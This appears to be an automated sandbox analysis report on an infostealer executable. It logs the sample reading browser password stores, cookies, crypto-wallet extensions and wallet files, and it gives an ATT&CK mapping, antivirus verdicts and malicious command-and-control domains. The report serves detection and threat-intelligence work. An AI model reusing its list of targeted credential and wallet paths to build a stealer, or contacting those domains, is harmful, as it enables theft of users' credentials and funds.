                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1482497732.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1482232390.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: onaUtwpiyq.exe PID: 3784, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: onaUtwpiyq.exe PID: 3784, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix (one line per tactic; the technique entries are listed in the report's row order, with the count the report shows beside an entry given in parentheses)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223); Wi-Fi Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
                Source | Detection | Scanner | Label | Link
                onaUtwpiyq.exe | 68% | Virustotal | | Browse
                onaUtwpiyq.exe | 61% | ReversingLabs | Win32.Trojan.Symmi |
                onaUtwpiyq.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
                onaUtwpiyq.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://mindhandru.buzz/CCf | 100% | Avira URL Cloud | malware |
                https://mindhandru.buzz/L | 100% | Avira URL Cloud | malware |
                https://mindhandru.buzz/CD | 100% | Avira URL Cloud | malware |
                https://mindhandru.buzz/rs | 100% | Avira URL Cloud | malware |
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208. | 0% | Avira URL Cloud | safe |
                https://mindhandru.buzz/Y | 100% | Avira URL Cloud | malware |
                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  mindhandru.buzz
                  104.21.11.101
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    scentniej.buzzfalse
                      high
                      rebuildeso.buzzfalse
                        high
                        appliacnesot.buzzfalse
                          high
                          screwamusresz.buzzfalse
                            high
                            cashfuzysao.buzzfalse
                              high
                              inherineau.buzzfalse
                                high
                                prisonyfork.buzzfalse
                                  high
                                  hummskitnj.buzzfalse
                                    high
                                    mindhandru.buzzfalse
                                      high
                                      https://mindhandru.buzz/apifalse
                                        high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/CD | onaUtwpiyq.exe, 00000000.00000003.1478996451.00000000053D4000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1478268121.00000000053D3000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1478886618.00000000053D3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/ | onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559836333.0000000000792000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560751027.0000000000792000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | onaUtwpiyq.exe, 00000000.00000003.1452801223.00000000053E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/pi | onaUtwpiyq.exe, 00000000.00000003.1524291361.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1559590194.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1550821627.0000000000803000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1405319597.000000000078B000.00000004.00000020.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000002.1560904316.0000000000803000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5 | onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | onaUtwpiyq.exe, 00000000.00000003.1406183581.000000000537D000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406244076.000000000537A000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406330511.000000000537A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | onaUtwpiyq.exe, 00000000.00000003.1453910932.000000000545F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208. | onaUtwpiyq.exe, 00000000.00000003.1454219729.00000000053D0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
